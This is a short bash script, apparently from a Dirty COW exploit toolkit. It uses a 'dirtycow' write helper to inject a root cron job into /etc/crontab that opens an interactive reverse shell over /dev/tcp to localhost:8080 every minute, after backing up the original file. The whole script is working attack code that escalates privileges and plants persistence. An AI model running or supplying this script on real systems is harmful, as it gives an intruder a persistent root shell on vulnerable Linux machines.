#!/bin/bash
#
# Add a job to /etc/crontab that tries to open a reverse root shell at
# localhost:8080 every minute. A backup of /etc/crontab is stored in $HOME
# before modifying the file.
#
# TODO: Test the cronjob to make sure it works properly.

. "$(dirname "$0")/common.sh"

if [ ! -r /etc/crontab ]; then
	die "/etc/crontab does not exist or is not readable."
fi

backup /etc/crontab "$HOME/crontab"
dirtycow -a /etc/crontab <<EOF
*/1 *	* * *	root	bash -i >&/dev/tcp/localhost/8080 0>&1
EOF
